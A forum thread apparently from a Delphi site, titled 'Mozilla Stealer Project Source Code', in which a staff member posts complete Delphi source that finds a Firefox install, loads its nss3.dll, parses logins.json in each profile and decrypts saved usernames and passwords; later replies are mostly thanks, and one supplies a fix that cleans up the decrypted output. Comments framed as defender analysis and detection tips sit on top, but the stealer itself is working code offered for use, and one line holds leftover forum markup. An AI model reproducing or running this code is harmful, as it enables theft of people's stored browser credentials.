
Mozilla Stealer Project Source Code

Discussion in 'Delphi Programming' started by AdminDF, Apr 10, 2015.

  1. AdminDF
    Online

    AdminDFAdminDF is a Verified Member Delphifan Staff Member DF Staff

    Code:
    // Console driver for the MozillaStealer unit: prints the string returned
    // by getMozilla to standard output and then waits for Enter.
    // As shown, this program does no file or network output of its own; the
    // recovered text only reaches the console.
    program Project2;
     
    {$APPTYPE CONSOLE}
     
    uses
      MozillaStealer;
     
    begin
      writeln(getMozilla());  // dump the URL:/LOG:/PWD: text built by the unit
      readln;                 // keep the console open until Enter is pressed
    end.
    Unit :
    
    // Analysis notes (defender view).
    // This unit exports one function, getMozilla. The visible code looks for a
    // Firefox install under the two default Program Files directories, loads
    // Firefox's own nss3.dll from there, and hands the encryptedUsername /
    // encryptedPassword values it scrapes from logins.json to that library's
    // PK11SDR_Decrypt export. Everything it reads lives in the Firefox install
    // directory and under the current user's %APPDATA%\Mozilla\Firefox.
    //
    // Behaviour worth alerting on: a process that is not Firefox loading
    // nss3.dll from the Firefox directory, and the same process reading
    // profiles.ini and logins.json under %APPDATA%\Mozilla\Firefox.
    //
    // NOTE(review): getMozilla calls PK11_Authenticate with a nil context, so
    // a profile protected by a Firefox Primary Password presumably fails that
    // call and never reaches the decrypt step -- confirm against NSS docs.
    unit mozillastealer;
     
    interface
     
    uses
      windows;
     
    // Only entry point of the unit; returns the recovered logins as text.
    function getMozilla(): string;
     
     
    implementation
     
    var
      version,                // declared but not referenced in the code shown
      FireFoxPath: string;    // set by GetFFInfos, read by getMozilla
     
    // Returns the names of the entries found under Path, one per line (CRLF).
    // Only names reported by FindNextFile are appended; the entry filled in by
    // the initial FindFirstFile call is not added to the result.
    // The search handle is neither checked for failure nor closed here, and
    // the empty EXCEPT block discards any exception, so the caller cannot tell
    // "directory missing" from "directory empty".
    function GetFileList(const Path: String): string;
    var a: Cardinal;              // search handle from FindFirstFile
       fa: _WIN32_FIND_DATAA;     // receives each directory entry
    begin
    result:='';
    TRY
    a:=FindFirstFile(PansiChar(path+PChar('\*.*')),fa);
    while FindNextFile(a,fa) do
    result:=result+fa.cFileName+#13#10;
    EXCEPT
    END;
    end;
     
    // Sets the unit-level FireFoxPath to the Firefox install directory, or
    // leaves it empty when neither probe matches.
    // Only two hard-coded locations on drive C: are checked, by searching the
    // directory listing text for the substring 'Mozilla Firefox'. The second
    // check runs unconditionally, so when both match the 64-bit Program Files
    // path wins. Exceptions are swallowed by the empty EXCEPT block.
    procedure GetFFInfos;
    begin
      FireFoxPath:='';
    TRY
      if pos('Mozilla Firefox', GetFileList('c:\Program Files (x86)\'))<>0 then FireFoxPath:='C:\Program Files (x86)\Mozilla Firefox\';
      if pos('Mozilla Firefox', GetFileList('c:\Program Files'))<>0 then FireFoxPath:='C:\Program Files\Mozilla Firefox\';
    EXCEPT
    END;
    end;
     
     
     
    // Returns field number Indice (0-based) of Texto when split on Delimitador.
    //   Texto        - text to split (passed by value; the local copy is cut up)
    //   Delimitador  - separator string
    //   Indice       - how many leading fields to skip
    // When Texto holds fewer delimiters than Indice, the remaining skips do
    // nothing and whatever text is left is returned.
    Function Splitter(Texto, Delimitador: String; Indice: integer): string;
    var
    DelimiPos, i: integer;
    begin
    // Drop one leading field (and its delimiter) per iteration.
    for i:= 1 to indice do
      begin
        DelimiPos:= pos(Delimitador,Texto);
        if DelimiPos <> 0 then
          Delete(Texto, 1, DelimiPos + length(Delimitador) -1);
      end;
     
    DelimiPos:= pos(Delimitador,Texto);
     
    // Cut the wanted field off at the next delimiter, if there is one.
    if DelimiPos <> 0 then
      Texto:= Copy(Texto,1,delimipos -1);
     
    // The SetLength is redundant: the assignment below replaces Result anyway.
    SetLength(Result, Length(Texto));
    Result:= Texto;
    end;
     
     
    // Returns the part of ForS that lies between the first occurrence of T_
    // and the first occurrence of _T after it.
    //   T_    - opening marker
    //   ForS  - text to search
    //   _T    - closing marker
    // Returns '' when any argument is empty, when T_ is not found, or when _T
    // does not occur after T_.
    function Pars(T_, ForS, _T: string): string;
    var a, b:integer;
    begin
    Result := '';
    if (T_='') or (ForS='') or (_T='') then Exit;
    a:=Pos(T_, ForS);
    if a=0 then Exit else a:=a+Length(T_);   // a now points just past T_
    ForS:=Copy(ForS, a, Length(ForS)-a+1);   // keep only the text after T_
    b:=Pos(_T, ForS);
    if b>0 then
    Result:=Copy(ForS, 1, b - 1);
    end;
     
     
     
    // Reads the whole of FileName into an AnsiString and returns it.
    // Returns '' when GetFileAttributes reports failure ($FFFFFFFF), i.e. the
    // path cannot be queried. The file is opened through the untyped-file
    // API with a record size of 1 so that FileSize is a byte count.
    // There is no try/finally: an error after Reset leaves the file open and
    // FileMode at 0.
    Function GetFile(const FileName : AnsiString) : AnsiString;
    Var
     F : File;
     FSize : Longint;
    begin
      Result:='';
      if GetFileAttributes(Pchar(FileName)) = DWORD($FFFFFFFF) then exit;
      FileMode:=0;              // open read-only for the Reset below
      AssignFile ( F, FileName);
      Reset(F, 1);
      FSize:=FileSize(F);
      SetLength(Result,FSize);
      // NOTE(review): the next line carries residue of the forum's
      // hidden-content markup and is not valid Pascal as extracted; it is
      // left exactly as found on the page.
      BHIDE-THANKSRead(F, Result[1],FSize);
      CloseFile(F);
      FileMode:=2;              // restore read/write mode
    end;
     
     
     
     
    // Extracts the saved-login records from the file named by j (a Firefox
    // logins.json) using plain substring matching rather than a JSON parser.
    // Returns one line per record, terminated by CRLF:
    //     hostname<|>encryptedUsername<|>encryptedPassword
    // The two encrypted fields are copied out exactly as stored in the file;
    // no decoding or decryption happens in this function.
    // The outer match depends on the file ending with the exact text
    // '}],"disabledHosts":[],"version":1}'; when that marker is absent Pars
    // returns '' and this function returns an empty string.
    function ParseMozJSON(j: string): string;
    var
    data, it, ress: string;
    begin
    data:=GetFile(j);
    // Keep only the contents of the "logins" array.
    data:=Pars(',"logins":[{',data,'}],"disabledHosts":[],"version":1}');
    while pos(',"hostname":"', data)<> 0 do
      begin
       // it = text of one record, from its hostname value up to timesUsed.
       it:= Pars(',"hostname":"', data, 'timesUsed":');
       ress:=ress + copy(it, 1, pos('","',it)-1);
       delete(it, 0, pos('encryptedUsername":"', it));
       ress:=ress + '<|>'+Pars('encryptedUsername":"',it,'","');
       delete(it, 0, pos('encryptedPassword":"', it));
       ress:=ress + '<|>'+Pars('encryptedPassword":"',it,'","')+#13#10;
       // Consume the record just handled so the loop moves to the next one.
       delete(data, 1, pos('timesUsed":',data));
    end;
    result:=ress;
    end;
     
     
    // Entry point of the unit. Returns the saved Firefox logins of the current
    // user as text, three lines per record followed by a blank line:
    //     URL:<tab>hostname
    //     LOG:<tab>decrypted user name
    //     PWD:<tab>decrypted password
    // Returns an empty string when no Firefox directory was found.
    //
    // How it works, as far as the code shows: it loads nss3.dll (and a list of
    // other DLLs) from the Firefox install directory, resolves seven NSS
    // exports by name, initialises NSS on the directory of the profile listed
    // as Profile0 in profiles.ini, and calls PK11SDR_Decrypt on each value
    // taken from logins.json.
    //
    // Review notes for analysts:
    //  - Every step sits in its own try/except with an empty handler, and no
    //    LoadLibrary / GetProcAddress / NSS return value other than NSS_Init,
    //    PK11_GetInternalKeySlot and PK11_Authenticate is checked.
    //  - NSS_Init always receives the Profile0 directory, while logins.json is
    //    read from each directory enumerated under Profiles\.
    //  - Detection surface: a non-Firefox process loading nss3.dll from the
    //    Firefox directory and reading profiles.ini / logins.json under
    //    %APPDATA%\Mozilla\Firefox.
    function getMozilla(): string;
    type
      // Local declaration of the item structure passed to the NSS calls:
      // a type tag, a data pointer and a length.
      TSECItem = packed record
      SECItemType: dword;
      SECItemData: pchar;
      SECItemLen: dword;
    end;
      PSECItem = ^TSECItem;
    var
      NSSModule: THandle;
      hToken: THandle;
      // Function pointers filled in with GetProcAddress below.
      NSS_Init: function(configdir: pchar): dword; cdecl;
      NSSBase64_DecodeBuffer: function(arenaOpt: pointer; outItemOpt: PSECItem; inStr: pchar; inLen: dword): dword; cdecl;
      PK11_GetInternalKeySlot: function: pointer; cdecl;
      PK11_Authenticate: function(slot: pointer; loadCerts: boolean; wincx: pointer): dword; cdecl;
      PK11SDR_Decrypt: function(data: PSECItem; result: PSECItem; cx: pointer): dword; cdecl;
      NSS_Shutdown: procedure; cdecl;
      PK11_FreeSlot: procedure(slot: pointer); cdecl;
      ProfilePath: array [0..MAX_PATH] of char;
      ProfilePathLen: dword;
      FirefoxProfilePath: pchar;
      MainProfile: array [0..MAX_PATH] of char;
      MainProfilePath: pchar;
      EncryptedSECItem: TSECItem;
      DecryptedSECItem: TSECItem;
      KeySlot: pointer;
      i:integer;
      username, password: string;
      V: Extended;
      buffer, huyufer: string;
      a: Cardinal;
      fa: _WIN32_FIND_DATAA;
    begin
    TRY
     
      // Step 1: find the Firefox install directory (sets FireFoxPath).
      try
    GetFFInfos;
    except
    end;
     
    try
    if FireFoxPath = '' then exit;
    except
    end;
     
    // Step 2: load DLLs from the Firefox directory. The ones before nss3.dll
    // are loaded only for their side effect (presumably so that nss3.dll's
    // imports resolve); their handles are discarded and failures are ignored.
    try
      LoadLibrary(pchar(FirefoxPath + 'mozglue.dll'));
    except
    end;
     
    try
      LoadLibrary(pchar(FirefoxPath + 'mozcrt19.dll'));
    except
    end;
     
    try
      LoadLibrary(pchar(FirefoxPath + 'mozutils.dll'));
    except
    end;
     
    try
      LoadLibrary(pchar(FirefoxPath + 'nspr4.dll'));
    except
    end;
     
    try
      LoadLibrary(pchar(FirefoxPath + 'plc4.dll'));
    except
    end;
     
    try
      LoadLibrary(pchar(FirefoxPath + 'plds4.dll'));
    except
    end;
     
    try
      LoadLibrary(pchar(FirefoxPath + 'nssutil3.dll'));
    except
    end;
     
    try
      NSSModule := LoadLibrary(pchar(FirefoxPath + 'nss3.dll'));
    except
    end;
     
    // Step 3: resolve the NSS exports by name. None of the results is checked
    // for nil before being called further down.
    try
      @NSS_Init := GetProcAddress(NSSModule, pchar('NSS_Init'));
    except
    end;
     
    try
      @NSSBase64_DecodeBuffer := GetProcAddress(NSSModule, pchar('NSSBase64_DecodeBuffer'));
    except
    end;
     
    try
      @PK11_GetInternalKeySlot := GetProcAddress(NSSModule, pchar('PK11_GetInternalKeySlot'));
    except
    end;
     
    try
      @PK11_Authenticate := GetProcAddress(NSSModule, pchar('PK11_Authenticate'));
    except
    end;
     
    try
      @PK11SDR_Decrypt := GetProcAddress(NSSModule, pchar('PK11SDR_Decrypt'));
    except
    end;
     
    try
      @NSS_Shutdown := GetProcAddress(NSSModule, pchar('NSS_Shutdown'));
    except
    end;
     
    try
      @PK11_FreeSlot := GetProcAddress(NSSModule, pchar('PK11_FreeSlot'));
    except
    end;
     
    // hToken is opened with TOKEN_QUERY but is not used or closed anywhere in
    // the code shown.
    try
      OpenProcessToken(GetCurrentProcess, TOKEN_QUERY, hToken);
    except
    end;
     
    // Step 4: build the profile paths from the current user's %APPDATA%.
    try
      ProfilePathLen := MAX_PATH;
    except
    end;
     
    try
      ZeroMemory(@ProfilePath, MAX_PATH);
    except
    end;
     
    try
      GetEnvironmentVariable('APPDATA', ProfilePath, ProfilePathLen);
    except
    end;
     
    // NOTE(review): the pchar below appears to point into a temporary string
    // built by the concatenation -- confirm its lifetime covers the call that
    // uses it.
    try
      FirefoxProfilePath := pchar(profilePath +'\Mozilla\Firefox\profiles.ini');
    except
    end;
     
    // Reads the Path value of section [Profile0] into MainProfile.
    try
      GetPrivateProfileString('Profile0', 'Path', '', MainProfile, MAX_PATH, FirefoxProfilePath);
    except
    end;
     
     
    // Step 5: walk the directories under Profiles\ and act on each one that
    // contains a logins.json file.
    a:=FindFirstFile(PansiChar(profilePath + '\Mozilla\Firefox\Profiles\'+PChar('\*.*')),fa);
          while FindNextFile(a,fa) do
            if GetFileAttributes(PChar(profilePath + '\Mozilla\Firefox\Profiles\'+fa.cFileName+'\logins.json')) <> DWORD($FFFFFFFF) then
              try
     
     
    // NSS is initialised on the Profile0 directory (mainProfile), not on the
    // directory currently being enumerated.
    if NSS_Init(pchar(profilePath + '\Mozilla\Firefox\' + mainProfile)) = 0 then
        begin
          KeySlot := PK11_GetInternalKeySlot;
          if KeySlot <> nil then
          begin
            // NOTE(review): nil is passed as the password context; with a
            // Firefox Primary Password set this call presumably returns
            // non-zero and the decrypt loop is skipped -- confirm.
            if PK11_Authenticate(KeySlot, True, nil) = 0 then
            begin
            huyufer:=ParseMozJSON(PChar(profilePath + '\Mozilla\Firefox\Profiles\'+fa.cFileName+'\logins.json'));
            // One iteration per CRLF-terminated record from ParseMozJSON.
            while pos(#13#10, huyufer)<>0 do
            BEGIN
                buffer:=copy(huyufer, 0, pos(#13#10, huyufer));
                delete(huyufer, 1, pos(#13#10, huyufer)+1);
                ZeroMemory(@EncryptedSECItem, SizeOf(EncryptedSECItem));
                ZeroMemory(@DecryptedSECItem, SizeOf(DecryptedSECItem));
     
                result := result + 'URL:'+#$9+Splitter(buffer, '<|>', 0) + #13#10;
                username:= Splitter(buffer, '<|>', 1);
                Password := Splitter(buffer, '<|>', 2);
     
     
                // Base64-decode, then decrypt the user name. Neither return
                // value is checked.
                NSSBase64_DecodeBuffer(nil, @EncryptedSECItem, pchar(Username), Length(Username));
     
                PK11SDR_Decrypt(@EncryptedSECItem, @DecryptedSECItem, nil);
                // SECItemData is appended as a null-terminated pchar;
                // SECItemLen is not consulted.
                Result := result + 'LOG:'+#$9+DecryptedSECItem.SECItemData + #13#10;
     
     
                ZeroMemory(@EncryptedSECItem, SizeOf(EncryptedSECItem));
                ZeroMemory(@DecryptedSECItem, SizeOf(DecryptedSECItem));
     
     
                // Same two calls for the password field.
                NSSBase64_DecodeBuffer(nil, @EncryptedSECItem, pchar(Password), Length(Password));
                PK11SDR_Decrypt(@EncryptedSECItem, @DecryptedSECItem, nil);
                Result := result + 'PWD:'+#$9+DecryptedSECItem.SECItemData  + #13#10+ #13#10;
              END;
            // The "result + ''" branches below change nothing; a failed step
            // simply contributes no output.
            end else result:= result + '';
            PK11_FreeSlot(KeySlot);
          end else
          result:= result + '';
          NSS_Shutdown;
        end else
        result:= result + '';
    except
    end;
    EXCEPT
    END;
    end;
     
    end.
  2. salimouu
    Offline

    salimouu DF Junior

    RE:

    Thanks
     
  3. jekl
    Offline

    jekl DF Junior

    RE:

    thanks
     
  4. dynamo
    Offline

    dynamo DF Expert

    RE:

    Thanks
     
  5. alexp25
    Online

    alexp25 Guest

    RE:

    Thanks
     
  6. Koru
    Online

    Koru Guest

    RE:

    thanks
     
  7. DIgitalNam
    Online

    DIgitalNam DF Junior DF Gold User

  8. marciords
    Offline

    marciords DF Member

    RE:

    thanks
     
  9. rikk
    Online

    rikk Guest

    Thank you
     
  10. chimotoki
    Offline

    chimotoki DF Junior

    thank you
     
  11. 2076874465
    Offline

    2076874465 DF Member

    RE:

    Delphifan Silver Group
     
  12. jccjr_sp
    Online

    jccjr_sp Guest

    RE:

    coolllll
     
  13. brst
    Online

    brst Guest

    gratooo
     
  14. nnlscxlm
    Offline

    nnlscxlm DF Member

    Interesting! I'm a bit shocked how easy it is to steal stored passwords from Firefox.

    In the demo, the decrypted strings are shown with trailing garbage. To fix it you can do something like

    var
    ...
      value: string;
    ...
      SetString(value, DecryptedSECItem.SECItemData, DecryptedSECItem.SECItemLen);
      Result := result + 'LOG:'+#$9+ value + #13#10;
     
     
